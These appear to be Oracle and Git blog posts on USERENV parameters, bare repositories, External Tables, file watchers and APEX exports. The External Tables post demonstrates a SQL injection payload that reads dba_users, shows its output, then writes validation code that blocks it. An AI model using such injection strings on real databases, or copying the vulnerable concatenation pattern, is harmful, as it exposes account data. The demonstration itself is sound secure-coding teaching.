In conjunction with the SYS_CONTEXT function, it’s incredibly useful if you want to know what’s happening in your session environment at any given time.
However, the parameters defined for this namespace are locked away beyond the reach of mere mortals, which means you have to rely on the documentation to know which parameters are valid on which version of Oracle.
You might think that’s not really a problem, after all, Oracle Documentation is pretty reliable, right ?
Yes…mostly…
Having grown lazy over the years and decided that I wanted to do as little typing as possible when logging from my PL/SQL code, I wrote a simple framework called Skippy, which is on GitHub, if you’re interested.
One element of Skippy is a simple table which holds a list of all the available parameters for the USERENV namespace and the version from which they are valid. There is also a view – SKIPPY_ENV, which overlays the table and returns values for the parameters which are valid for the Oracle version it’s currently running.
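To give a flavour of the approach ( this is a simplified sketch rather than Skippy’s actual definitions; the table, view and column names here are invented), a version-aware view might look something like this :

create table userenv_params
(
    parameter_name varchar2(128),
    valid_from_version number
);

create or replace view my_env_vw
as
    select parameter_name,
        sys_context('userenv', parameter_name) as value
    from userenv_params
    where valid_from_version <=
        (
            select to_number(regexp_substr(version_full, '^\d+'))
            from product_component_version
            where product like 'Oracle Database%'
        );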
Originally, the parameters listed in the table were gleaned from the Oracle documentation, the most recent versions being the 19c and 23ai SQL Language References.
Unfortunately, there are a couple of discrepancies between the documentation and the database.
According to the 19c documentation, CDB_DOMAIN is a valid parameter on 19c, whilst CLOUD_SERVICE is not mentioned.
Meanwhile, IS_APPLICATION_ROOT and IS_APPLICATION_PDB are absent from the 23ai docs, despite them having been around since 19c.
The reality on 19c is that CDB_DOMAIN is not valid, but CLOUD_SERVICE is (tested on an OCI Free Tier instance) :
select product, version_full
from product_component_version;
PRODUCT VERSION_FULL
-------------------------------------------------- --------------------
Oracle Database 19c Enterprise Edition 19.24.0.1.0
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual;
…results in…
ORA-02003: invalid USERENV parameter
By contrast…
select sys_context('userenv', 'cloud_service') as cloud_service from dual;
CLOUD_SERVICE
--------------------
OLTP
select sys_context('userenv', 'is_application_root') as is_application_root from dual;
IS_APPLICATION_ROOT
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;
IS_APPLICATION_PDB
--------------------
NO
Meanwhile, it appears that IS_APPLICATION_ROOT and IS_APPLICATION_PDB are still valid on 23ai. This time, I’ve tested on a VirtualBox Dev Day Appliance :
select product, version_full
from product_component_version;
PRODUCT VERSION_FULL
-------------------------------------------------- --------------------
Oracle Database 23ai Free 23.4.0.24.05
select sys_context('userenv', 'is_application_root') as is_application_root from dual;
IS_APPLICATION_ROOT
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;
IS_APPLICATION_PDB
--------------------
NO
CDB_DOMAIN has also made an appearance in this version :
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual;
CDB_DOMAIN
--------------------
CLOUD_SERVICE is still kicking around :
select sys_context('userenv', 'cloud_service') as cloud_service from dual;
CLOUD_SERVICE
--------------------
I’ve submitted comments on the appropriate documentation pages but I can’t see any way to track the response or progress on these.
Fortunately for me, my friendly neighbourhood marsupial has now got this covered, but it’s something you may want to keep an eye out for if you maintain your own list of USERENV Parameters.
Creating a central Repository using Git Bare
When working in a large IT department, there are times when you feel a bit like a Blue Peter presenter.
For example, there may be a requirement to collaborate with other programmers on a project but, for whatever reason, you do not have access to a hosting platform ( Github, Bitbucket, Gitlab – pick your favourite).
What you do have is a network share to which you all have access, and Git installed locally on each of your machines.
This can be thought of as the technical equivalent of an empty washing-up bottle, a couple of loo rolls and some sticky back plastic.
Fortunately, this represents the raw materials required to construct a Tracey Island or – in this case – a Bare Git Repo to act as the main repository for the project…
The Repository we want to share looks like this :
To create the main repository, we can open a command window and create a directory to hold it on the share ( which is mapped to Z:\ in my case) :
mkdir z:\blue_peter
…then navigate to the new directory and create a Bare Repo …
git init --bare
You can then populate it by pushing from your existing local repository :
git remote add origin z:\blue_peter
git push origin main
NOTE – it could be because I was doing this on a VM, but when I first ran the push, I got an error about the ownership of the shared directory :
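The screenshot isn’t included here, but the message was Git’s standard complaint, along the lines of :

fatal: detected dubious ownership in repository at 'z:/blue_peter'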
This can be solved by running :
git config --global --add safe.directory z:\blue_peter
Looking at the files in our new main repo, we can see that they’re not shown as individual project files, as you’d expect in a normal working copy :
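Instead, what you get is Git’s internal plumbing. A listing of a bare repo will typically contain something like :

HEAD
config
description
hooks
info
objects
refs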
However, we can access the contents via Git in the normal way.
For example, I can now clone the repository to a different location. In real-life this would be a completely different client, but I’ve run out of VMs !
git clone z:\blue_peter
Side Note – Once again, I hit the dubious ownership issue :
Anyhow, we can see the files as usual in the cloned repo :
…and the repository now behaves as expected. If we make a change and push it…
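For example ( illustrative commands run from the working copy; the filename is made up) :

git add thunderbird_2.txt
git commit -m "Add Tracey Island assembly instructions"
git push origin main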
We can pull the repo in another “client” :
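Again, nothing out of the ordinary ( illustrative) :

git pull origin main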
After all that, I think you’ve earned a Blue Peter Badge.
Oracle External Tables and the External Modify Clause
I like to think that I’m not completely useless in the kitchen. A pinch of this, a dash of that and a glug of what you fancy ( which may or may not make its way into whatever I’m cooking) and the result is usually edible at least.
That said, the combination of precise quantities of substances by means of closely controlled chemical reactions is more Deb’s forte.
The result is usually delicious. Being traditionalists in our house, we do like to follow the time-honoured bake-off format and have a judging session of the finished article. We think of it as the Great British Cake Scoff.
However satisfying the act of culinary creation may be, there are times when you just want something you need to stick in the microwave for 2 minutes.
Which brings us to the matter of Oracle External Tables.
When they first arrived, External Tables provided an easy way to load data from a file directly into the database without all that messing about with SQL*Loader.
Of course, there were some limitations. If you wanted to point an external table at a file, you’d have to issue an alter table statement to set it ( and possibly the directory as well).
This meant that External Table access had to be serialized to ensure that it was pointed at the correct file until you were finished with it.
If you find yourself switching between Oracle versions, it’s worth remembering that, these days, things are a little different, thanks to the EXTERNAL MODIFY clause, which arrived in 12c.
What I’ll be looking at here is whether External tables can now be used concurrently in different sessions, accessing different files.
I’ll also explore the EXTERNAL MODIFY clause’s aversion to bind variables and how we might work around this securely in PL/SQL.
The Application
The examples that follow were run on an Oracle Developer Day Virtual Box instance running Oracle 19.3.
We have a directory…
create or replace directory recipies_dir as '/u01/app/recipies';
…which contains some text files…
ls -1
debs_lemon_drizzle_cake.txt
mikes_beans_on_toast.txt
…and a simple external table to read files…
create table nom_nom_xt
(
line number,
text varchar2(4000)
)
organization external
(
type oracle_loader
default directory upload_files
access parameters
(
records delimited by newline
nologfile
nobadfile
nodiscardfile
fields terminated by '~'
missing field values are null
(
line recnum,
text char(4000)
)
)
location('')
)
reject limit unlimited
/
You’ll notice that I’ve specified the default directory as this is mandatory. However the location (i.e. the target file) is currently null.
Now, in the olden days, we’d have to issue a DDL statement to set the location before we could look at a file.
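For example, something along these lines would have been needed before each query ( a sketch using the objects above) :

alter table nom_nom_xt default directory recipies_dir;
alter table nom_nom_xt location ('mikes_beans_on_toast.txt');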
Since 12c however, we have the EXTERNAL MODIFY clause, so we can do this directly in a query :
select text
from nom_nom_xt
external modify
(
default directory recipies_dir
location('mikes_beans_on_toast.txt')
)
/
Alternatively…
select text
from nom_nom_xt
external modify
(
location(recipies_dir:'debs_lemon_drizzle_cake.txt')
)
/
After running these statements, we can see that the EXTERNAL MODIFY clause has had no effect on the table definition itself :
select directory_name, location
from user_external_locations
where table_name = 'NOM_NOM_XT';
Looking at the EXTERNAL MODIFY clause, it would seem that External Tables should now behave like Global Temporary Tables in that, whilst their structure is permanent, the data they contain is session specific.
Let’s put that to the test.
First of all, I’m going to take advantage of the fact I’m on Linux ( Oracle Linux Server 7.6 since you ask) and generate a text file from /usr/share/dict/words – a file that contains a list of words.
In the recipies directory on the os :
for i in {1..100}; do cat /usr/share/dict/words >>alphabet_soup.txt; done
cat alphabet_soup.txt >alphabetty_spaghetti.txt
I now have two rather chunky text files :
ls -lh alphabet*
-rw-r--r--. 1 oracle oinstall 473M May 27 14:25 alphabet_soup.txt
-rw-r--r--. 1 oracle oinstall 473M May 27 14:26 alphabetty_spaghetti.txt
…containing just under 48 million lines each…
cat alphabet_soup.txt |wc -l
47982800
Using the single external table, I’m going to load each file into a separate table in separate sessions.
The script for session 1 is :
set worksheetname Soup
column start_time format a10
column end_time format a10
-- Check that this is a different session from "session 2"
select sys_context('userenv', 'sessionid') from dual;
-- Give me time to switch sessions and start the other script
exec dbms_session.sleep(2);
select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;
set timing on
create table alphabet_soup as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabet_soup.txt'));
set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;
select count(*) from alphabet_soup;
In session 2 :
set worksheetname Spaghetti
column start_time format a10
column end_time format a10
-- Check that this is a different session from "session 1"
select sys_context('userenv', 'sessionid') from dual;
select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;
set timing on
create table alphabetty_spaghetti as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabetty_spaghetti.txt'));
set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;
select count(*) from alphabetty_spaghetti;
Note – the set worksheetname command is SQLDeveloper specific.
The results are…
Session 1 (Soup)

SYS_CONTEXT('USERENV','SESSIONID')
------------------------------------
490941
PL/SQL procedure successfully completed.
START_TIME
----------
14:45:08
Table ALPHABET_SOUP created.
Elapsed: 00:01:06.199
END_TIME
----------
14:46:15
COUNT(*)
----------
47982800
Session 2 (Spaghetti)

SYS_CONTEXT('USERENV','SESSIONID')
-----------------------------------
490942
START_TIME
----------
14:45:09
Table ALPHABETTY_SPAGHETTI created.
Elapsed: 00:01:08.043
END_TIME
----------
14:46:17
COUNT(*)
----------
47982800
As we can see, the elapsed time is almost identical in both sessions. More importantly, both sessions’ CTAS statements finished within a couple of seconds of each other.
Therefore, we can conclude that both sessions accessed the External Table in parallel.
Whilst this does represent a considerable advance in the utility of External Tables, there is something of a catch when it comes to using them to access files via SQL*Plus…
Persuading EXTERNAL MODIFY to eat its greens
A common use case for External Tables tends to be ETL processing. In such circumstances, the name of the file being loaded is likely to change frequently and so needs to be specified at runtime.
It’s also not unusual to have an External Table that you want to use on more than one directory ( e.g. as a log file viewer).
On the face of it, the EXTERNAL MODIFY clause should present no barrier to use in PL/SQL :
clear screen
set serverout on
begin
for r_line in
(
select text
from nom_nom_xt external modify ( default directory recipies_dir location ('debs_lemon_drizzle_cake.txt') )
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
Whilst this works with no problems, look what happens when we try to use a variable to specify the filename :
clear screen
set serverout on
declare
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
begin
for r_line in
(
select text
from nom_nom_xt
external modify
(
default directory recipies_dir
location (v_file)
)
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
ORA-06550: line 7, column 90:
PL/SQL: ORA-00905: missing keyword
Specifying the directory in a variable doesn’t work either :
declare
v_dir varchar2(4000) := 'recipies_dir';
begin
for r_line in
(
select text
from nom_nom_xt
external modify
(
default directory v_dir
location ('debs_lemon_drizzle_cake.txt')
)
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
ORA-06564: object V_DIR does not exist
Just in case you’re tempted to solve this by doing something simple like :
clear screen
set serverout on
declare
v_dir all_directories.directory_name%type := 'recipies_dir';
v_file varchar2(100) := 'mikes_beans_on_toast.txt';
v_stmnt clob :=
q'[
select text
from nom_nom_xt external modify( default directory <dir> location('<file>'))
]';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
open v_rc for v_stmnt;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line(v_text);
end loop;
close v_rc;
end;
/
You should be aware that this approach is vulnerable to SQL Injection.
I know that it’s become fashionable in recent years for “Security” to be invoked as a reason for all kinds of – often questionable – restrictions on the hard-pressed Software Engineer.
So, just in case you’re sceptical about this, here’s a quick demo :
clear screen
set serverout on
declare
v_dir varchar2(500) :=
q'[recipies_dir location ('mikes_beans_on_toast.txt')) union all select username||' '||account_status||' '||authentication_type from dba_users --]';
v_file varchar2(100) := 'mikes_beans_on_toast.txt';
v_stmnt varchar2(4000) := q'[select text from nom_nom_xt external modify (default directory <dir> location ('<file>'))]';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
open v_rc for v_stmnt;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line(v_text);
end loop;
close v_rc;
end;
/
bread
baked beans
butter
SYS OPEN PASSWORD
SYSTEM OPEN PASSWORD
XS$NULL EXPIRED & LOCKED PASSWORD
HR OPEN PASSWORD
...snip...
PL/SQL procedure successfully completed.
If we resort to Dynamic SQL, we can pass the filename into the query as a bind variable :
set serverout on
declare
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob :=
'select text from nom_nom_xt external modify( default directory recipies_dir location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
v_rtn number;
begin
open v_rc for v_stmnt using v_file;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
…or, if you prefer…
clear screen
set serverout on
declare
v_file varchar2(120) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob := q'[select text from nom_nom_xt external modify( default directory recipies_dir location (:b1))]';
v_rc sys_refcursor;
v_text varchar2(4000);
v_curid number;
v_rtn number;
begin
v_curid := dbms_sql.open_cursor;
dbms_sql.parse(v_curid, v_stmnt, dbms_sql.native);
dbms_sql.bind_variable(v_curid, 'b1', v_file);
v_rtn := dbms_sql.execute(v_curid);
v_rc := dbms_sql.to_refcursor(v_curid);
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
225g unsalted butter
225g caster sugar
4 free-range eggs
225g self-raising flour
1 unwaxed lemon
85g icing sugar
PL/SQL procedure successfully completed.
However, Oracle remains rather recalcitrant when you try doing the same with the default directory.
RTFM RTOB ( Read the Oracle Base article) !
After a number of “glugs” from a bottle of something rather expensive whilst trawling through the Oracle Documentation for some clues, I happened to look at the Oracle Base article on this topic which notes that you cannot use bind variables when specifying the Default Directory.
One possible workaround would be to create one external table for each directory that you want to look at.
Alternatively, we can sanitize the incoming value for the DEFAULT DIRECTORY before we drop it into our query.
To this end, DBMS_ASSERT is not going to be much help.
The SQL_OBJECT_NAME function does not recognize Directory Objects…
select dbms_assert.sql_object_name('recipies_dir') from dual;
ORA-44002: invalid object name
… and the SIMPLE_SQL_NAME function will allow pretty much anything if it’s quoted…
select dbms_assert.simple_sql_name(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]')
from dual;
DBMS_ASSERT.SIMPLE_SQL_NAME(Q'["RECIPIES_DIRLOCATION('MIKES_BEANS_ON_TOAST.TXT'))UNIONALLSELECTUSERNAMEFROMDBA_USERS--"]')
---------------------------------------------------------------------------
"recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"
Time then, to unplug the microwave and cook up something home-made…
I’m running on 19c so I know that :
- A directory object name should be a maximum of 128 characters long
- the name will conform to the Database Object Naming Rules
Additionally, I’m going to assume that we’re following Oracle’s recommendation that quoted identifiers are not used for database object names (including Directories). You can find that pearl of wisdom in the page linked above.
Finally, I want to make sure that a user only accesses a valid directory object on which they have appropriate permissions.
Something like this should get us most of the way :
set serverout on
clear screen
declare
v_dir varchar2(4000) := 'recipies_dir';
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob :=
'select text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
v_rtn number;
v_placeholder pls_integer;
v_found_dir boolean;
cursor c_valid_dir is
select null
from all_directories
where directory_name = upper(v_dir);
begin
if length( v_dir) > 128 then
raise_application_error(-20101, 'Directory Identifier is too long');
end if;
-- Assume allowable characters are alphanumeric and underscore. Reject if it contains anything else
if regexp_instr(replace(v_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
raise_application_error(-20110, 'Directory Name contains wacky characters');
end if;
open c_valid_dir;
fetch c_valid_dir into v_placeholder;
v_found_dir := c_valid_dir%found;
close c_valid_dir;
if v_found_dir = false then
raise_application_error(-20120, 'Directory not found');
end if;
v_stmnt := replace(v_stmnt, '<dir>', v_dir);
open v_rc for v_stmnt using v_file;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
We can now convert this into an Invoker’s rights package, that should restrict access to directories visible by the calling user :
create or replace package peckish
authid current_user
as
type t_nom is table of varchar2(4000);
procedure validate_directory(i_dir in varchar2);
function recipe( i_dir in varchar2, i_file in varchar2)
return t_nom pipelined;
end peckish;
/
create or replace package body peckish as
procedure validate_directory( i_dir in varchar2)
is
v_placeholder pls_integer;
v_found_dir boolean;
cursor c_valid_dir is
select null
from all_directories
where directory_name = upper(i_dir);
begin
if length( i_dir) > 128 then
raise_application_error(-20101, 'Directory Identifier is too long');
end if;
if regexp_instr(replace(i_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
raise_application_error(-20110, 'Directory Name contains wacky characters');
end if;
open c_valid_dir;
fetch c_valid_dir into v_placeholder;
v_found_dir := c_valid_dir%found;
close c_valid_dir;
if v_found_dir = false then
raise_application_error(-20120, 'Directory not found');
end if;
end validate_directory;
function recipe( i_dir in varchar2, i_file in varchar2)
return t_nom pipelined
is
v_nom nom_nom_xt%rowtype;
v_stmnt clob :=
'select line, text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
validate_directory(i_dir);
v_stmnt := replace(v_stmnt, '<dir>', i_dir);
open v_rc for v_stmnt using i_file;
loop
fetch v_rc into v_nom.line, v_nom.text;
exit when v_rc%notfound;
pipe row( v_nom);
end loop;
close v_rc;
end recipe;
end peckish;
/
Let’s run some tests :
select line as line_no, text as ingredient
from table(peckish.recipe('recipies_dir', 'debs_lemon_drizzle_cake.txt'))
/
LINE_NO INGREDIENT
---------- ----------------------------------------
1 225g unsalted butter
2 225g caster sugar
3 4 free-range eggs
4 225g self-raising flour
5 1 unwaxed lemon
6 85g icing sugar
6 rows selected.
select text as ingredient
from table (
peckish.recipe(
'this_is_a_very_long_identifier_to_check_that_the_length_restriction_works_as_expected._Is_that_128_characters_yet_?_Apparently_not_Oh_well_lets_keep_going_for_a_bit',
'mikes_beans_on_toast.txt'
))
/
ORA-20101: Directory Identifier is too long
select text as ingredient
from table(
peckish.recipe
(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]',
'debs_lemon_drizzle_cake.txt'
))
/
ORA-20110: Directory Name contains wacky characters
select text as ingredient
from table (peckish.recipe('super_secret_dir', 'mikes_beans_on_toast.txt'))
/
ORA-20120: Directory not found
All of which has left me feeling rather in the mood for a snack. I wonder if there’s any of that cake left ?
Freddie Starr Ate My File ! Finding out exactly what the Oracle Filewatcher is up to
As useful as they undoubtedly are, any use of DBMS_SCHEDULER File Watchers in Oracle is likely to involve a number of moving parts.
This can make trying to track down issues feel a bit like being on a hamster wheel.
Fortunately, you can easily find out just exactly what the filewatcher is up to, if you know where to look …
I’ve got a procedure to populate a table with details of any arriving file.
create table incoming_files(
destination VARCHAR2(4000),
directory_path VARCHAR2(4000),
actual_file_name VARCHAR2(4000),
file_size NUMBER,
file_timestamp TIMESTAMP WITH TIME ZONE)
/
create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
insert into incoming_files(
destination,
directory_path,
actual_file_name,
file_size,
file_timestamp)
values(
i_result.destination,
i_result.directory_path,
i_result.actual_file_name,
i_result.file_size,
i_result.file_timestamp);
end;
/
The filewatcher and associated objects that will invoke this procedure are :
begin
dbms_credential.create_credential
(
credential_name => 'starr',
username => 'fstarr',
password => 'some-complex-password'
);
end;
/
begin
dbms_scheduler.create_file_watcher(
file_watcher_name => 'freddie',
directory_path => '/u01/app/upload_files',
file_name => '*.txt',
credential_name => 'starr',
enabled => false,
comments => 'Feeling peckish');
end;
/
begin
dbms_scheduler.create_program(
program_name => 'snack_prog',
program_type => 'stored_procedure',
program_action => 'save_incoming_file',
number_of_arguments => 1,
enabled => false);
-- need to make sure this program can see the message sent by the filewatcher...
dbms_scheduler.define_metadata_argument(
program_name => 'snack_prog',
metadata_attribute => 'event_message',
argument_position => 1);
-- Create a job that links the filewatcher to the program...
dbms_scheduler.create_job(
job_name => 'snack_job',
program_name => 'snack_prog',
event_condition => null,
queue_spec => 'freddie',
auto_drop => false,
enabled => false);
end;
/
The relevant components have been enabled :
begin
dbms_scheduler.enable('freddie');
dbms_scheduler.enable('snack_prog');
dbms_scheduler.enable('snack_job');
end;
/
… and – connected on the os as fstarr – I’ve dropped a file into the directory…
echo 'Squeak!' >/u01/app/upload_files/hamster.txt
Watching the (File)Watcher
File watchers are initiated by a scheduled run of the SYS FILE_WATCHER job.
The logging_level value determines whether or not the executions of this job will be available in the *_SCHEDULER_JOB_RUN_DETAILS views.
select program_name, schedule_name,
job_class, logging_level
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/
PROGRAM_NAME SCHEDULE_NAME JOB_CLASS LOGGING_LEVEL
-------------------- ------------------------- ----------------------------------- ---------------
FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE SCHED$_LOG_ON_ERRORS_CLASS FULL
If the logging_level is set to OFF (which appears to be the default in 19c), you can enable it by connecting as SYSDBA and running :
begin
dbms_scheduler.set_attribute('FILE_WATCHER', 'logging_level', dbms_scheduler.logging_full);
end;
/
The job is assigned the FILE_WATCHER_SCHEDULE, which runs every 10 minutes by default. To check the current settings :
select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/
REPEAT_INTERVAL
------------------------------
FREQ=MINUTELY;INTERVAL=10
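If the default 10 minutes is a little too leisurely for you, the interval can be shortened by changing the schedule’s repeat_interval – as a suitably privileged user (e.g. connected as SYSDBA), and bearing in mind that this affects every file watcher on the instance. For example, to check every two minutes :
begin
    dbms_scheduler.set_attribute('FILE_WATCHER_SCHEDULE', 'repeat_interval', 'freq=minutely; interval=2');
end;
/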
The thing is, there are times when the SYS.FILE_WATCHER seems to slope off for a tea-break. So, if you’re wondering why your file has not been processed yet, it’s handy to be able to check if this job has run when you expected it to.
In this case, as logging is enabled, we can do just that :
select log_id, log_date, instance_id, req_start_date, actual_start_date
from dba_scheduler_job_run_details
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
and log_date >= sysdate - (1/24)
order by log_date desc
/
LOG_ID LOG_DATE INSTANCE_ID REQ_START_DATE ACTUAL_START_DATE
------- ----------------------------------- ----------- ------------------------------------------ ------------------------------------------
1282 13-APR-24 14.50.47.326358000 +01:00 1 13-APR-24 14.50.47.000000000 EUROPE/LONDON 13-APR-24 14.50.47.091753000 EUROPE/LONDON
1274 13-APR-24 14.40.47.512172000 +01:00 1 13-APR-24 14.40.47.000000000 EUROPE/LONDON 13-APR-24 14.40.47.075846000 EUROPE/LONDON
1260 13-APR-24 14.30.47.301176000 +01:00 1 13-APR-24 14.30.47.000000000 EUROPE/LONDON 13-APR-24 14.30.47.048977000 EUROPE/LONDON
1248 13-APR-24 14.20.47.941210000 +01:00 1 13-APR-24 14.20.47.000000000 EUROPE/LONDON 13-APR-24 14.20.47.127769000 EUROPE/LONDON
1212 13-APR-24 14.10.48.480193000 +01:00 1 13-APR-24 14.10.47.000000000 EUROPE/LONDON 13-APR-24 14.10.47.153032000 EUROPE/LONDON
1172 13-APR-24 14.00.50.676270000 +01:00 1 13-APR-24 14.00.47.000000000 EUROPE/LONDON 13-APR-24 14.00.47.111936000 EUROPE/LONDON
6 rows selected.
Even if the SYS.FILE_WATCHER is not logging, when it does run, any files being watched for are added to a queue, the contents of which can be found in SCHEDULER_FILEWATCHER_QT.
This query will get you the really useful details of what your filewatcher has been up to :
select
t.step_no,
treat( t.user_data as sys.scheduler_filewatcher_result).actual_file_name as filename,
treat( t.user_data as sys.scheduler_filewatcher_result).file_size as file_size,
treat( t.user_data as sys.scheduler_filewatcher_result).file_timestamp as file_ts,
t.enq_time,
x.name as filewatcher,
x.requested_file_name as search_pattern,
x.credential_name as credential_name
from sys.scheduler_filewatcher_qt t,
table(t.user_data.matching_requests) x
where enq_time > trunc(sysdate)
order by enq_time
/
STEP_NO FILENAME FILE_SIZE FILE_TS ENQ_TIME FILEWATCHER SEARCH_PATTERN CREDENTIAL_NAME
---------- --------------- ---------- -------------------------------- ---------------------------- --------------- --------------- ---------------
0 hamster.txt 8 13-APR-24 12.06.58.000000000 GMT 13-APR-24 12.21.31.746338000 FREDDIE *.txt STARR
Happily, in this case, our furry friend has avoided the Grim Squeaker…
NOTE – No hamsters were harmed in the writing of this post.
If you think I’m geeky, you should meet my friend.
I’d like to talk about a very good friend of mine.
Whilst he’s much older than me ( 11 or 12 weeks at least), we do happen to share interests common to programmers of a certain vintage.
About a year ago, he became rather unwell.
Since then, whenever I’ve gone to visit, I’ve taken care to wear something that’s particular to our friendship and/or appropriately geeky.
At one point, when things were looking particularly dicey, I promised him, that whilst “Captain Scarlet” was already taken, if he came through he could pick any other colour he liked.
As a life-long Luton Town fan, his choice was somewhat inevitable.
So then, what follows – through the medium of Geeky T-shirts – is a portrait of my mate Simon, The Indestructible Captain Orange…
When we first met, Windows 3.1 was still on everyone’s desktop and somewhat prone to hanging at inopportune moments. Therefore, we are fully aware of both the origins and continuing relevance of this particular pearl of wisdom :
Fortunately, none of the machines Simon was wired up to in the hospital seemed to be running any version of Windows so I thought he’d be reassured by this :
Whilst our first meeting did not take place on a World riding through space on the back of a Giant Turtle ( it was in fact, in Milton Keynes), Simon did earn my eternal gratitude by recommending the book Good Omens – which proved to be my gateway to Discworld.
The relevance of this next item of “Geek Chic” is that, when Simon later set up his own company, he decided that it should have a Latin motto.
In this, he was inspired by the crest of the Ankh-Morpork Assassins’ Guild :
His motto :
Nil codex sine Lucre
…which translates as …
No code without payment
From mottoes to something more akin to a mystic incantation, chanted whenever you’re faced with a seemingly intractable technical issue. Also, Simon likes this design so…
As we both know, there are 10 types of people – those who understand binary and those who don’t…
When confronted by something like this, I am able to recognise that the binary numbers are ASCII codes representing alphanumeric characters. However, I’ve got nothing on Simon, a one-time Assembler Programmer.
Whilst I’m mentally removing my shoes and socks in preparation to translate the message, desperately trying to remember the golden rule of binary maths ( don’t forget to carry the 1), he’ll just come straight out with the answer (“Geek”, in this case).
Saving the geekiest to last, I’m planning to dazzle with this on my next visit :
Techie nostalgia and a Star Wars reference all on the one t-shirt. I don’t think I can top that. Well, not for now anyway.
Using the APEX_DATA_EXPORT package directly from PL/SQL
As Data Warehouse developers, there is frequently a need for us to produce user reports in a variety of formats (ok, Excel).
Often these reports are the output of processes running as part of an unattended batch.
In the past I’ve written about some of the solutions out there for creating csv files and, of course Excel.
The good news is that, since APEX 20.2, Oracle provides the ability to do this out-of-the-box by means of the APEX_DATA_EXPORT PL/SQL package.
The catch is that you need to have an active APEX session to call it.
Which means you need to have an APEX application handy.
Fortunately, it is possible to initiate an APEX session and call this package without going anywhere near the APEX UI itself, as you’ll see shortly.
Specifically, what we’ll cover is :
- generating comma-separated (CSV) output
- generating an XLSX file
- using the ADD_AGGREGATE procedure to add a summary
- using the ADD_HIGHLIGHT procedure to apply conditional formatting
- using the GET_PRINT_CONFIG function to apply document-wide styling
Additionally, we’ll explore how to create a suitable APEX Application from a script if one is not already available.
Incidentally, the scripts in this post can be found in this Github Repo.
Before I go any further, I should acknowledge the work of Amirreza Rastandeh, whose LinkedIn article inspired this post.
A quick word on the Environment I used in these examples – it’s an Oracle supplied VirtualBox appliance running Oracle 23c Free Database and APEX 22.2.
Generating CSV output
APEX_DATA_EXPORT offers a veritable cornucopia of output formats. However, to begin with, let’s keep things simple and just generate a CSV into a CLOB object so that we can check the contents directly from within a script.
We will need to call APEX_SESSION.CREATE_SESSION and pass it some details of an APEX application in order for this to work, so the first thing we need to do is check whether we have such an application available :
select workspace, application_id, page_id, page_name
from apex_application_pages
order by page_id
/
WORKSPACE APPLICATION_ID PAGE_ID PAGE_NAME
------------------------------ -------------- ---------- --------------------
HR_REPORT_FILES 105 0 Global Page
HR_REPORT_FILES 105 1 Home
HR_REPORT_FILES 105 9999 Login Page
As long as we get at least one row back from this query, we’re good to go. Now for the script itself (called csv_direct.sql) :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
begin
dbms_output.put_line('Getting app details...');
-- We only need the first record returned by this cursor
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
dbms_output.put_line('Creating session');
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike' -- this parameter is mandatory but can be any string apparently
);
v_stmnt := 'select * from departments';
dbms_output.put_line('Opening context');
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
dbms_output.put_line('Running Report');
v_export := apex_data_export.export
(
p_context => v_context,
p_format => 'CSV', -- patience ! We'll get to the Excel shortly.
p_as_clob => true -- by default the output is saved as a blob. This overrides to save as a clob
);
apex_exec.close( v_context);
dbms_output.put_line(v_export.content_clob);
end;
/
Running this we get :
Getting app details...
Creating session
Opening context
Running Report
